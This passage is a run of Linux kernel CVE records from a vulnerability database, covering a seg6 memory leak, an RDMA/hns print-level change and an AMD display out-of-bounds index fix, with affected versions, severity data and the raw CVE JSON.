        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36960",
    "datePublished": "2024-06-03T07:49:58.951Z",
    "dateReserved": "2024-05-30T15:25:07.081Z",
    "dateUpdated": "2025-05-04T09:12:52.237Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-39490 (GCVE-0-2024-39490)

Vulnerability from cvelistv5 – Published: 2024-07-10 07:14 – Updated: 2025-05-04 09:16

Title

ipv6: sr: fix missing sk_buff release in seg6_input_core

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: sr: fix missing sk_buff release in seg6_input_core The seg6_input() function is responsible for adding the SRH into a packet, delegating the operation to the seg6_input_core(). This function uses the skb_cow_head() to ensure that there is sufficient headroom in the sk_buff for accommodating the link-layer header. In the event that the skb_cow_header() function fails, the seg6_input_core() catches the error but it does not release the sk_buff, which will result in a memory leak. This issue was introduced in commit af3b5158b89d ("ipv6: sr: fix BUG due to headroom too small after SRH push") and persists even after commit 7a3f5b0de364 ("netfilter: add netfilter hooks to SRv6 data plane"), where the entire seg6_input() code was refactored to deal with netfilter hooks. The proposed patch addresses the identified memory leak by requiring the seg6_input_core() function to release the sk_buff in the event that skb_cow_head() fails.

Severity ?

6.2 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-401 - Missing Release of Memory after Effective Lifetime

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e8688218e38111ace…
	https://git.kernel.org/stable/c/8f1fc3b86eaea70be…
	https://git.kernel.org/stable/c/f4df8c7670a737522…
	https://git.kernel.org/stable/c/f5fec1588642e415a…
	https://git.kernel.org/stable/c/5447f9708d9e4c17a…

Impacted products

Vendor

Product

Version

Linux

Affected: af3b5158b89d3bab9be881113417558c71b71ca4 , < e8688218e38111ace457509d8f0cad75f79c1a7a (git)
Affected: af3b5158b89d3bab9be881113417558c71b71ca4 , < 8f1fc3b86eaea70be6abcae2e9aa7e7b99453864 (git)
Affected: af3b5158b89d3bab9be881113417558c71b71ca4 , < f4df8c7670a73752201cbde215254598efdf6ce8 (git)
Affected: af3b5158b89d3bab9be881113417558c71b71ca4 , < f5fec1588642e415a3d72e02140160661b303940 (git)
Affected: af3b5158b89d3bab9be881113417558c71b71ca4 , < 5447f9708d9e4c17a647b16a9cb29e9e02820bd9 (git)

Linux

Affected: 4.12
Unaffected: 0 , < 4.12 (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "NONE",
              "baseScore": 6.2,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-39490",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-11T18:24:36.803451Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-401",
                "description": "CWE-401 Missing Release of Memory after Effective Lifetime",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-25T19:15:34.027Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.676Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e8688218e38111ace457509d8f0cad75f79c1a7a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f1fc3b86eaea70be6abcae2e9aa7e7b99453864"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f4df8c7670a73752201cbde215254598efdf6ce8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f5fec1588642e415a3d72e02140160661b303940"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5447f9708d9e4c17a647b16a9cb29e9e02820bd9"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/seg6_iptunnel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e8688218e38111ace457509d8f0cad75f79c1a7a",
              "status": "affected",
              "version": "af3b5158b89d3bab9be881113417558c71b71ca4",
              "versionType": "git"
            },
            {
              "lessThan": "8f1fc3b86eaea70be6abcae2e9aa7e7b99453864",
              "status": "affected",
              "version": "af3b5158b89d3bab9be881113417558c71b71ca4",
              "versionType": "git"
            },
            {
              "lessThan": "f4df8c7670a73752201cbde215254598efdf6ce8",
              "status": "affected",
              "version": "af3b5158b89d3bab9be881113417558c71b71ca4",
              "versionType": "git"
            },
            {
              "lessThan": "f5fec1588642e415a3d72e02140160661b303940",
              "status": "affected",
              "version": "af3b5158b89d3bab9be881113417558c71b71ca4",
              "versionType": "git"
            },
            {
              "lessThan": "5447f9708d9e4c17a647b16a9cb29e9e02820bd9",
              "status": "affected",
              "version": "af3b5158b89d3bab9be881113417558c71b71ca4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/seg6_iptunnel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.12"
            },
            {
              "lessThan": "4.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: sr: fix missing sk_buff release in seg6_input_core\n\nThe seg6_input() function is responsible for adding the SRH into a\npacket, delegating the operation to the seg6_input_core(). This function\nuses the skb_cow_head() to ensure that there is sufficient headroom in\nthe sk_buff for accommodating the link-layer header.\nIn the event that the skb_cow_header() function fails, the\nseg6_input_core() catches the error but it does not release the sk_buff,\nwhich will result in a memory leak.\n\nThis issue was introduced in commit af3b5158b89d (\"ipv6: sr: fix BUG due\nto headroom too small after SRH push\") and persists even after commit\n7a3f5b0de364 (\"netfilter: add netfilter hooks to SRv6 data plane\"),\nwhere the entire seg6_input() code was refactored to deal with netfilter\nhooks.\n\nThe proposed patch addresses the identified memory leak by requiring the\nseg6_input_core() function to release the sk_buff in the event that\nskb_cow_head() fails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:54.371Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e8688218e38111ace457509d8f0cad75f79c1a7a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f1fc3b86eaea70be6abcae2e9aa7e7b99453864"
        },
        {
          "url": "https://git.kernel.org/stable/c/f4df8c7670a73752201cbde215254598efdf6ce8"
        },
        {
          "url": "https://git.kernel.org/stable/c/f5fec1588642e415a3d72e02140160661b303940"
        },
        {
          "url": "https://git.kernel.org/stable/c/5447f9708d9e4c17a647b16a9cb29e9e02820bd9"
        }
      ],
      "title": "ipv6: sr: fix missing sk_buff release in seg6_input_core",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39490",
    "datePublished": "2024-07-10T07:14:09.667Z",
    "dateReserved": "2024-06-25T14:23:23.747Z",
    "dateUpdated": "2025-05-04T09:16:54.371Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38590 (GCVE-0-2024-38590)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:45 – Updated: 2025-05-04 09:14

Title

RDMA/hns: Modify the print level of CQE error

Summary

In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Modify the print level of CQE error Too much print may lead to a panic in kernel. Change ibdev_err() to ibdev_err_ratelimited(), and change the printing level of cqe dump to debug level.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/45b31be4dd2282790…
	https://git.kernel.org/stable/c/cc699b7eb2bc963c1…
	https://git.kernel.org/stable/c/17f3741c65c4a042a…
	https://git.kernel.org/stable/c/6f541a89ced8305da…
	https://git.kernel.org/stable/c/817a10a6df9354e67…
	https://git.kernel.org/stable/c/06cf121346bbd3d83…
	https://git.kernel.org/stable/c/349e859952285ab96…

Impacted products

Vendor

Product

Version

Linux

Affected: 7c044adca272768d821921f11d3da4587dcec68a , < 45b31be4dd22827903df15c548b97b416790139b (git)
Affected: 7c044adca272768d821921f11d3da4587dcec68a , < cc699b7eb2bc963c12ffcd37f80f45330d2924bd (git)
Affected: 7c044adca272768d821921f11d3da4587dcec68a , < 17f3741c65c4a042ae8ba094068b07a4b77e213c (git)
Affected: 7c044adca272768d821921f11d3da4587dcec68a , < 6f541a89ced8305da459e3ab0006e7528cf7da7b (git)
Affected: 7c044adca272768d821921f11d3da4587dcec68a , < 817a10a6df9354e67561922d2b7fce48dfbebc55 (git)
Affected: 7c044adca272768d821921f11d3da4587dcec68a , < 06cf121346bbd3d83a5eea05bb87666c6b279990 (git)
Affected: 7c044adca272768d821921f11d3da4587dcec68a , < 349e859952285ab9689779fb46de163f13f18f43 (git)

Linux

Affected: 5.8
Unaffected: 0 , < 5.8 (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38590",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-20T15:39:58.504819Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-20T15:40:07.688Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.931Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/45b31be4dd22827903df15c548b97b416790139b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc699b7eb2bc963c12ffcd37f80f45330d2924bd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17f3741c65c4a042ae8ba094068b07a4b77e213c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6f541a89ced8305da459e3ab0006e7528cf7da7b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/817a10a6df9354e67561922d2b7fce48dfbebc55"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/06cf121346bbd3d83a5eea05bb87666c6b279990"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/349e859952285ab9689779fb46de163f13f18f43"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/hns/hns_roce_hw_v2.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "45b31be4dd22827903df15c548b97b416790139b",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            },
            {
              "lessThan": "cc699b7eb2bc963c12ffcd37f80f45330d2924bd",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            },
            {
              "lessThan": "17f3741c65c4a042ae8ba094068b07a4b77e213c",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            },
            {
              "lessThan": "6f541a89ced8305da459e3ab0006e7528cf7da7b",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            },
            {
              "lessThan": "817a10a6df9354e67561922d2b7fce48dfbebc55",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            },
            {
              "lessThan": "06cf121346bbd3d83a5eea05bb87666c6b279990",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            },
            {
              "lessThan": "349e859952285ab9689779fb46de163f13f18f43",
              "status": "affected",
              "version": "7c044adca272768d821921f11d3da4587dcec68a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/hns/hns_roce_hw_v2.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.8"
            },
            {
              "lessThan": "5.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/hns: Modify the print level of CQE error\n\nToo much print may lead to a panic in kernel. Change ibdev_err() to\nibdev_err_ratelimited(), and change the printing level of cqe dump\nto debug level."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:14:47.116Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/45b31be4dd22827903df15c548b97b416790139b"
        },
        {
          "url": "https://git.kernel.org/stable/c/cc699b7eb2bc963c12ffcd37f80f45330d2924bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/17f3741c65c4a042ae8ba094068b07a4b77e213c"
        },
        {
          "url": "https://git.kernel.org/stable/c/6f541a89ced8305da459e3ab0006e7528cf7da7b"
        },
        {
          "url": "https://git.kernel.org/stable/c/817a10a6df9354e67561922d2b7fce48dfbebc55"
        },
        {
          "url": "https://git.kernel.org/stable/c/06cf121346bbd3d83a5eea05bb87666c6b279990"
        },
        {
          "url": "https://git.kernel.org/stable/c/349e859952285ab9689779fb46de163f13f18f43"
        }
      ],
      "title": "RDMA/hns: Modify the print level of CQE error",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38590",
    "datePublished": "2024-06-19T13:45:41.928Z",
    "dateReserved": "2024-06-18T19:36:34.930Z",
    "dateUpdated": "2025-05-04T09:14:47.116Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42119 (GCVE-0-2024-42119)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:01

Title

drm/amd/display: Skip finding free audio for unknown engine_id

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Skip finding free audio for unknown engine_id [WHY] ENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it also means it is uninitialized and does not need free audio. [HOW] Skip and return NULL. This fixes 2 OVERRUN issues reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9eb4db08a808e3a3b…
	https://git.kernel.org/stable/c/eacca028a623f6086…
	https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b…
	https://git.kernel.org/stable/c/afaaebdee9bb9f26d…
	https://git.kernel.org/stable/c/874261358d31fc772…
	https://git.kernel.org/stable/c/95ad20ee3c4efbb91…
	https://git.kernel.org/stable/c/881fb6afc0004c5e6…
	https://git.kernel.org/stable/c/1357b2165d9ad94fa…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < eacca028a623f608607d02457122ee5284491e18 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 874261358d31fc772f2823604167e670983cc1ca (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 95ad20ee3c4efbb91f9a4ab08e070aa3697f5879 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 881fb6afc0004c5e6392ae2848f825bf051dae14 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:51.528Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eacca028a623f608607d02457122ee5284491e18"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/874261358d31fc772f2823604167e670983cc1ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95ad20ee3c4efbb91f9a4ab08e070aa3697f5879"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/881fb6afc0004c5e6392ae2848f825bf051dae14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42119",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:03.551339Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:05.530Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "eacca028a623f608607d02457122ee5284491e18",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "874261358d31fc772f2823604167e670983cc1ca",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "95ad20ee3c4efbb91f9a4ab08e070aa3697f5879",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "881fb6afc0004c5e6392ae2848f825bf051dae14",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
